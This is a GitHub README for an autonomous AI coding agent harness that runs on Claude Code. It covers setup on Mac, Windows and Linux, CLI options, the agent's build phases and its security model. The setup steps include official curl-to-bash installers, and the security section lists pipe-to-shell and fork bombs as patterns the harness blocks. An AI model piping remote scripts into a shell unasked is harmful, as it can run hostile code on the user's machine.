Skip to content

Autonomous AI coding agent that builds complete applications from plain English descriptions using Claude Code

Notifications You must be signed in to change notification settings

tripleyak/agent-harness

Repository files navigation

Agent Harness

An autonomous AI coding agent that builds entire applications from a simple description.


Table of Contents

  1. What Is This?
  2. What You'll Need
  3. Understanding Key Concepts
  4. Step-by-Step Setup
  5. Getting Claude Access
  6. Installing the Agent Harness
  7. Creating Your First App Specification
  8. Running the Agent
  9. Understanding the Phases
  10. All Options Explained
  11. Understanding the Output
  12. Troubleshooting
  13. Glossary
  14. Architecture Reference

What Is This?

The Simple Explanation

Imagine you could describe an app you want built in plain English, and then an AI builds it for you automatically. That's what this tool does.

You write something like:

"Build me a todo list app where users can add tasks, mark them complete, and delete them."

And the Agent Harness:

  1. Thinks through what needs to be built (planning)
  2. Breaks it down into small, manageable features
  3. Writes the code for each feature, one by one
  4. Tests its work to make sure it works
  5. Keeps going until everything is done

Why Use This?

  • You don't need to know how to code - Just describe what you want
  • It builds complete projects - Not just code snippets, but full applications
  • It's autonomous - You can walk away and let it work
  • It's resumable - If something stops, it picks up where it left off
  • It has safety features - Human checkpoints let you review the work

How It Works (Visual Overview)

┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│   YOU                         AGENT HARNESS                     │
│                                                                 │
│   ┌─────────────┐            ┌─────────────────────────────┐   │
│   │ "Build me   │            │                             │   │
│   │  a todo     │ ────────►  │  Phase 1: VIBE PLAN         │   │
│   │  app..."    │            │  (Explores ideas freely)    │   │
│   └─────────────┘            │                             │   │
│                              │  Phase 2: INITIALIZATION    │   │
│                              │  (Creates feature list)     │   │
│                              │                             │   │
│                              │  Phase 3: CODING            │   │
│                              │  (Builds each feature)      │   │
│                              │                             │   │
│   ┌─────────────┐            │  Phase 4: VALIDATION        │   │
│   │ Complete    │ ◄────────  │  (You review the work)      │   │
│   │ Application │            │                             │   │
│   └─────────────┘            └─────────────────────────────┘   │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

What You'll Need

Before we start, make sure you have:

Requirement Description
A computer Mac, Windows, or Linux
Internet connection For downloading tools and AI access
30-60 minutes For the initial setup
Claude access Either an API key OR a Claude Max/Pro subscription

Cost considerations:

  • Claude API: Pay per use (roughly $3-15 per application built, depending on size)
  • Claude Max: $100/month subscription with generous usage included

Understanding Key Concepts

If you're completely new to this, here are the terms you'll encounter:

The Terminal (Command Line)

The terminal is a text-based way to control your computer. Instead of clicking on icons, you type commands.

This is what the terminal looks like:

your-computer:~ username$ _
                           ↑
                     You type here

Why use it? Many developer tools only work through the terminal. Don't worry - we'll show you exactly what to type.

Git and GitHub

  • Git is a tool that tracks changes to your code (like "undo history" for an entire project)
  • GitHub is a website that stores your code online (like Google Drive for code)

Why do we need this? The Agent Harness uses Git to save its work and let you see what changed.

Node.js

Node.js is a program that runs JavaScript code on your computer. The Agent Harness is written in JavaScript/TypeScript, so you need Node.js to run it.

API Key

An API key is like a password that lets programs access online services. You'll need one to let the Agent Harness talk to Claude (the AI).

Claude

Claude is an AI assistant made by Anthropic. It's the "brain" that writes the code. There are different ways to access Claude:

  1. Claude API - Direct access, pay per use
  2. Claude Code - A command-line tool that uses Claude
  3. Claude Max/Pro - Subscription plans with Claude Code included

Step-by-Step Setup

Choose your operating system:


Mac Setup

Step 1: Open the Terminal

  1. Press Command (⌘) + Space on your keyboard
  2. Type Terminal
  3. Press Enter

A window should appear with a prompt like:

your-name@your-mac ~ %

Tip: You can also find Terminal in Applications → Utilities → Terminal

Step 2: Install Homebrew (Package Manager)

Homebrew is a tool that makes installing other software easy on Mac.

  1. Copy and paste this entire command into your terminal:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
  1. Press Enter
  2. You may be asked to enter your Mac password (the one you use to log in)
    • Note: When you type your password, nothing will appear on screen - this is normal for security
    • Just type it and press Enter
  3. Wait for it to finish (this can take 5-10 minutes)

How to verify it worked:

brew --version

You should see something like Homebrew 4.x.x

Step 3: Install Node.js

Node.js lets your computer run the Agent Harness.

  1. Type this command and press Enter:
brew install node
  1. Wait for it to finish

How to verify it worked:

node --version

You should see something like v20.x.x or v22.x.x

Also check npm (Node's package manager):

npm --version

You should see something like 10.x.x

Step 4: Install Git

Git tracks changes to your code.

  1. Type this command and press Enter:
brew install git

How to verify it worked:

git --version

You should see something like git version 2.x.x

Step 5: Configure Git (First Time Only)

Tell Git who you are (this is attached to the code changes you make):

git config --global user.name "Your Name"
git config --global user.email "your.email@example.com"

Replace Your Name and your.email@example.com with your actual name and email.

Step 6: Install GitHub CLI

The GitHub CLI lets you interact with GitHub from the terminal.

  1. Type this command and press Enter:
brew install gh

How to verify it worked:

gh --version

You should see something like gh version 2.x.x

Step 7: Log in to GitHub

  1. If you don't have a GitHub account, go to github.com and create one (it's free)

  2. In your terminal, type:

gh auth login
  1. You'll see a series of questions. Choose these options:

    • What account do you want to log into?GitHub.com
    • What is your preferred protocol?HTTPS
    • Authenticate Git with your GitHub credentials?Yes
    • How would you like to authenticate?Login with a web browser
  2. A code will appear. Press Enter, and a browser window will open

  3. Paste the code in the browser and authorize the application

How to verify it worked:

gh auth status

You should see "Logged in to github.com"

Step 8: Install Claude Code

Claude Code is the command-line tool that lets Claude write code for you.

npm install -g @anthropic-ai/claude-code

How to verify it worked:

claude --version

You should see version information.

Now continue to Getting Claude Access


Windows Setup

Step 1: Install Windows Terminal (Recommended)

Windows has a built-in terminal, but Windows Terminal is better.

  1. Open the Microsoft Store (search for it in the Start menu)
  2. Search for Windows Terminal
  3. Click Install
  4. Once installed, open Windows Terminal from the Start menu

Step 2: Install Node.js

  1. Open your web browser and go to: https://nodejs.org
  2. Click the big green button that says "LTS" (Long Term Support)
  3. A file will download (something like node-v20.x.x-x64.msi)
  4. Double-click the downloaded file to run the installer
  5. Click Next through all the screens, accepting the defaults
  6. Click Install
  7. Click Finish when done

How to verify it worked:

  1. Open Windows Terminal
  2. Type:
node --version

You should see something like v20.x.x

Also check npm:

npm --version

Step 3: Install Git

  1. Go to: https://git-scm.com/download/windows
  2. The download should start automatically
  3. Run the installer
  4. Important settings during installation:
    • Choosing the default editor: Select "Use Visual Studio Code" or "Use Notepad++" if you have them, otherwise keep the default
    • Adjusting your PATH: Select "Git from the command line and also from 3rd-party software"
    • For all other options, the defaults are fine - just click Next
  5. Click Install, then Finish

How to verify it worked:

Close and reopen Windows Terminal, then type:

git --version

Step 4: Configure Git (First Time Only)

git config --global user.name "Your Name"
git config --global user.email "your.email@example.com"

Step 5: Install GitHub CLI

  1. Go to: https://cli.github.com
  2. Click Download for Windows
  3. Run the installer
  4. Follow the prompts and click Install

How to verify it worked:

Close and reopen Windows Terminal, then type:

gh --version

Step 6: Log in to GitHub

  1. Create a GitHub account at github.com if you don't have one
  2. In Windows Terminal, type:
gh auth login
  1. Follow the prompts (same as Mac instructions above)

Step 7: Install Claude Code

npm install -g @anthropic-ai/claude-code

How to verify it worked:

claude --version

Now continue to Getting Claude Access


Linux Setup

These instructions are for Ubuntu/Debian-based distributions. Commands may vary for other distributions.

Step 1: Open Terminal

Press Ctrl + Alt + T or find Terminal in your applications menu.

Step 2: Update Your System

sudo apt update && sudo apt upgrade -y

Enter your password when prompted.

Step 3: Install Node.js

curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

Verify:

node --version
npm --version

Step 4: Install Git

sudo apt install -y git

Verify:

git --version

Step 5: Configure Git

git config --global user.name "Your Name"
git config --global user.email "your.email@example.com"

Step 6: Install GitHub CLI

curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null
sudo apt update
sudo apt install gh -y

Verify:

gh --version

Step 7: Log in to GitHub

gh auth login

Follow the prompts.

Step 8: Install Claude Code

npm install -g @anthropic-ai/claude-code

Verify:

claude --version

Now continue to Getting Claude Access


Getting Claude Access

You need to connect Claude (the AI) to the Agent Harness. There are two ways to do this:

Option A: Claude Max/Pro Subscription (Recommended for Beginners)

If you have a Claude Max ($100/month) or Claude Pro subscription, Claude Code is included.

Step 1: Set Up Claude Code Authentication

  1. In your terminal, type:
claude
  1. Claude Code will open and ask you to authenticate
  2. Follow the prompts to log in with your Anthropic account
  3. Once logged in, type /exit to close Claude Code

That's it! Claude Code will remember your login.

Option B: Using an API Key

If you want to use the API directly (pay-per-use):

Step 1: Create an Anthropic Account

  1. Go to https://console.anthropic.com
  2. Click Sign Up and create an account
  3. Verify your email

Step 2: Add Payment Method

  1. In the Anthropic Console, go to Settings → Billing
  2. Add a credit card
  3. Add some credits (start with $10-20 for testing)

Step 3: Create an API Key

  1. Go to Settings → API Keys
  2. Click Create Key
  3. Give it a name like "agent-harness"
  4. Copy the key immediately - you won't be able to see it again!

The key looks like: sk-ant-api03-xxxxxxxxxxxx...

Step 4: Save Your API Key

You need to make this key available to the Agent Harness.

On Mac/Linux:

echo 'export ANTHROPIC_API_KEY=sk-ant-api03-your-key-here' >> ~/.zshrc
source ~/.zshrc

On Windows (PowerShell):

[Environment]::SetEnvironmentVariable("ANTHROPIC_API_KEY", "sk-ant-api03-your-key-here", "User")

Then close and reopen your terminal.

IMPORTANT: Replace sk-ant-api03-your-key-here with your actual API key.

Security note: Never share your API key or commit it to GitHub.


Installing the Agent Harness

Now let's get the Agent Harness itself!

Step 1: Clone the Repository

This downloads the Agent Harness code from GitHub to your computer.

git clone https://github.com/tripleyak/agent-harness.git

Step 2: Navigate to the Folder

cd agent-harness

Your terminal prompt should now show you're in the agent-harness folder.

Step 3: Install Dependencies

This downloads all the code libraries that Agent Harness needs:

npm install

Wait for it to finish. You'll see lots of text scrolling by - this is normal.

Step 4: Build the Project

This compiles the code so it can run:

npm run build

How to verify it worked:

npm start -- --help

You should see a help message with all the available commands.


Creating Your First App Specification

An app specification (or "spec") is a text file that describes what you want to build.

Step 1: Create a New File

You can use any text editor. Here's how to do it from the terminal:

On Mac/Linux:

nano prompts/my_first_app.txt

On Windows:

notepad prompts/my_first_app.txt

Step 2: Write Your Description

Here's an example of a simple app spec:

# Simple Todo App

A command-line todo list application.

## Requirements

- Users can add new tasks with a description
- Users can list all tasks
- Users can mark tasks as complete
- Users can delete tasks
- Tasks are saved to a file so they persist between runs
- Use Node.js with no external dependencies

## Example Usage

$ node todo.js add "Buy groceries"
Added: Buy groceries

$ node todo.js list
1. [ ] Buy groceries

$ node todo.js complete 1
Completed: Buy groceries

$ node todo.js list
1. [x] Buy groceries

Step 3: Save the File

  • nano: Press Ctrl + X, then Y, then Enter
  • notepad: Press Ctrl + S and close the window

Tips for Writing Good Specs

  1. Be specific - Instead of "build a good app", say exactly what features you want
  2. Include examples - Show how you expect the app to work
  3. Mention technologies - If you want Node.js, Python, etc., say so
  4. List constraints - "No external dependencies" or "Must work offline"
  5. Start small - Your first project should be simple (5-10 features)

Example Specs

Minimal (2 features):

# Hello Greeter

A simple Node.js module that greets users.

## Requirements
- Single file: greeter.js
- One function: greet(name) returns "Hello, {name}!"
- Handle empty name: return "Hello, stranger!"
- No external dependencies

Medium (10 features):

# Password Generator CLI

A command-line password generator tool.

## Requirements
- Generate random passwords of specified length
- Option to include/exclude: uppercase, lowercase, numbers, symbols
- Option to generate multiple passwords at once
- Copy password to clipboard
- Save passwords to encrypted file
- Check password strength
- No external dependencies except for clipboard functionality

Running the Agent

Basic Command

Navigate to the agent-harness folder and run:

npm start -- run -s prompts/my_first_app.txt --subprocess

Let's break this down:

  • npm start - Starts the Agent Harness
  • -- - Separates npm arguments from program arguments
  • run - The command to run the agent
  • -s prompts/my_first_app.txt - Path to your app specification
  • --subprocess - Uses Claude Code for authentication (recommended)

What Happens Next

  1. Project folder created - A new folder appears (default: agent_project/)
  2. Vibe plan phase - The AI thinks through the project
  3. Initialization - Features are identified and listed
  4. Coding begins - Features are built one by one
  5. Completion - All features are implemented

Watching the Progress

The terminal will show you what's happening:

🤖 Agent Harness - Autonomous Coding Agent

   Project: /path/to/agent_project
   Mode: Claude Code subprocess (Max plan)
   Model: claude-opus-4-5-20251101
   Features: 50

📁 New project detected. Running initialization...

🎨 Phase 1: Vibe Plan (Exploration)
   Exploring project ideas and architecture...

🏗 Phase 2: Structured Planning & Setup

📊 Progress:
   Total features: 5
   Completed: 2 (40%)
   In progress: 1
   [████████████░░░░░░░░░░░░░░░░░░] 40%

Stopping and Resuming

  • To stop: Press Ctrl + C
  • To resume: Run the same command again - it picks up where it left off

Running with All Features

For a full-featured run with human review:

npm start -- run \
  -s prompts/my_first_app.txt \
  --project ./my_app \
  --subprocess \
  --enable-rag \
  --enable-validation \
  --review-every 3 \
  --enable-tests

Understanding the Phases

Phase 1: Vibe Plan (Exploration)

What it does: The AI freely explores your idea, thinking about:

  • Architecture approaches
  • Potential challenges
  • Edge cases
  • Technology choices

Output: vibe-plan-notes.md - A document with the AI's thoughts

Skip it with: --skip-vibe-plan

Phase 2: Initialization

What it does:

  • Reads your app specification
  • Creates a detailed feature list
  • Sets up the project folder structure
  • Initializes git repository

Output: feature_list.json - List of all features to build

Phase 3: Coding Sessions

What it does:

  • Works through features one by one
  • Writes code for each feature
  • Commits changes to git
  • Tracks progress in feature_list.json

Each session:

  1. Looks at what's done and what's next
  2. Picks the next feature
  3. Writes the code
  4. Marks it complete
  5. Repeats until done

Phase 4: Validation (Optional)

What it does: Pauses for you to review the AI's work

When it triggers:

  • After every N features (configurable)
  • Automatically for security-related features

Your options:

  • Approve - Continue to next feature
  • Reject - Stop for manual fixes
  • Skip - Continue without approval
  • Feedback - Tell the AI what to change

All Options Explained

Required Options

Option Description Example
-s, --spec <path> Path to your app specification file -s prompts/my_app.txt

Common Options

Option Description Default Example
-p, --project <dir> Where to create the project ./agent_project -p ./my_app
-m, --model <model> Which AI model to use claude-opus-4-5-20251101 -m claude-sonnet-4-5-20250514
-f, --features <n> Maximum features to generate 50 -f 20
-i, --iterations <n> Maximum coding sessions (0=unlimited) 0 -i 10
--subprocess Use Claude Code for auth Off --subprocess

Advanced Options

Option Description Default
--skip-vibe-plan Skip the exploration phase Off
--no-auto-resume Don't automatically continue Auto-resume on
-d, --delay <ms> Wait time between sessions 3000 (3 seconds)

Feature Flags

Option Description
--enable-rag Gather context from existing code
--enable-validation Enable human review checkpoints
--review-every <n> Review after every N features
--enable-tests Run tests before each session
--test-after-each Also run tests after each feature

Example Commands

Minimal run:

npm start -- run -s prompts/app.txt --subprocess

Full featured:

npm start -- run \
  -s prompts/app.txt \
  --project ./my_project \
  --subprocess \
  --features 30 \
  --enable-rag \
  --enable-validation \
  --review-every 5 \
  --enable-tests \
  --test-after-each

Quick test (small project):

npm start -- run \
  -s prompts/minimal_spec.txt \
  --project ./test_project \
  --subprocess \
  --features 5 \
  --iterations 3 \
  --skip-vibe-plan

Check project status:

npm start -- status -p ./my_project

Understanding the Output

The Project Folder

After running, you'll find these files in your project folder:

my_project/
├── feature_list.json      # List of features and their status
├── app_spec.txt           # Copy of your specification
├── vibe-plan-notes.md     # AI's exploration thoughts
├── claude-progress.txt    # Session log
├── human-feedback.md      # Your feedback (if any)
├── validation-log.json    # Review decisions
├── .git/                  # Git repository
└── [your app files]       # The actual code!

Feature Status

In feature_list.json, each feature has a status:

Status Meaning
pending Not started yet
in_progress Currently being worked on
passing Completed successfully
failing Attempted but has issues

Git Commits

Every feature creates a git commit. You can see the history:

cd my_project
git log --oneline

To see what changed in a commit:

git show <commit-id>

Progress Bar

📊 Progress:
   Total features: 10
   Completed: 4 (40%)
   In progress: 1
   Failed: 0
   Pending: 5
   [████████████░░░░░░░░░░░░░░░░░░] 40%

Troubleshooting

"Command not found: claude"

Problem: Claude Code isn't installed properly.

Solution:

npm install -g @anthropic-ai/claude-code

If that doesn't work, try:

sudo npm install -g @anthropic-ai/claude-code

"ANTHROPIC_API_KEY not set"

Problem: The API key isn't configured.

Solutions:

  1. If using Claude Max: Make sure you ran claude and logged in first

  2. If using API key: Set it in your terminal:

    export ANTHROPIC_API_KEY=your-key-here

"Permission denied"

Problem: You don't have permission to install or run something.

Solution: On Mac/Linux, add sudo before the command:

sudo npm install -g @anthropic-ai/claude-code

"Cannot find module"

Problem: Dependencies aren't installed.

Solution:

cd agent-harness
npm install
npm run build

The agent keeps stopping

Problem: You might be hitting rate limits or the AI is confused.

Solutions:

  1. Wait a few minutes and run again (it will resume)
  2. Check your API credits if using pay-per-use
  3. Try a simpler specification

The code doesn't work

Problem: The AI made mistakes.

Solutions:

  1. Enable validation: --enable-validation --review-every 1
  2. Provide more specific requirements in your spec
  3. Check the generated code and provide feedback
  4. Start with a simpler project

How to start over

If you want to completely restart:

rm -rf ./agent_project

Then run the command again.


Glossary

Term Definition
Agent An AI system that can take actions autonomously
API Application Programming Interface - how programs talk to each other
API Key A secret code that authenticates you to a service
CLI Command Line Interface - text-based program interaction
Clone Download a copy of a Git repository
Commit A saved snapshot of code changes in Git
Dependencies Other code libraries your project needs
Git Version control system that tracks code changes
GitHub Website that hosts Git repositories
Homebrew Package manager for Mac
JSON A text format for storing structured data
Node.js Program that runs JavaScript on your computer
npm Node Package Manager - installs JavaScript libraries
OAuth A way to log in without sharing your password
RAG Retrieval-Augmented Generation - giving AI relevant context
Repository (Repo) A folder tracked by Git
Terminal Text-based interface to control your computer
Token A unit of text that AI models process
TypeScript JavaScript with added type checking

Architecture Reference

System Overview

┌─────────────────────────────────────────────────────────────┐
│                     Agent Harness                            │
├─────────────────────────────────────────────────────────────┤
│  Orchestrator (index.ts)                                     │
│    ├── Vibe Plan Session → Generate exploration notes       │
│    ├── Initializer Session → Generate feature_list.json     │
│    └── Coder Sessions → Implement features incrementally    │
├─────────────────────────────────────────────────────────────┤
│  Agent Modes                                                 │
│    ├── API Mode (agent.ts) → Direct Anthropic API calls     │
│    └── Subprocess Mode (agent-subprocess.ts) → Claude Code  │
├─────────────────────────────────────────────────────────────┤
│  Context Engineering                                         │
│    ├── RAG (rag.ts) → Retrieve relevant code context        │
│    ├── Vibe Plan (vibe-plan.ts) → Unstructured exploration  │
│    └── Human Feedback → Incorporate review notes            │
├─────────────────────────────────────────────────────────────┤
│  Validation                                                  │
│    ├── Human Checkpoints (validation.ts)                    │
│    └── Test Runner (test-runner.ts)                         │
├─────────────────────────────────────────────────────────────┤
│  Security (security.ts)                                      │
│    ├── Command allowlist                                     │
│    ├── Path boundary validation                              │
│    └── Dangerous pattern detection                           │
├─────────────────────────────────────────────────────────────┤
│  State Management                                            │
│    └── feature_list.json (source of truth)                   │
└─────────────────────────────────────────────────────────────┘

Two-Agent Pattern

  1. Initializer Agent (Session 1)

    • Reads application specification
    • Generates comprehensive feature list
    • Sets up project structure
    • Initializes git repository
  2. Coder Agent (Sessions 2+)

    • Reads progress from feature_list.json
    • Implements features incrementally
    • Tests and commits changes
    • Auto-continues between sessions

Security Model

Defense-in-depth approach:

  1. Command Allowlist - Only specific commands can execute
  2. Path Boundary - All file operations restricted to project directory
  3. Dangerous Pattern Detection - Blocks fork bombs, pipe to shell, etc.

File-Based State

All state is externalized to files for multi-session continuity:

  • feature_list.json - Source of truth for features and progress
  • claude-progress.txt - Human-readable session log
  • vibe-plan-notes.md - Exploration phase output
  • human-feedback.md - Feedback for next session
  • validation-log.json - Audit trail of reviews
  • Git commits - Audit trail and rollback capability

Getting Help


License

MIT


This project was inspired by Anthropic's autonomous-coding quickstart.

About

Autonomous AI coding agent that builds complete applications from plain English descriptions using Claude Code

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published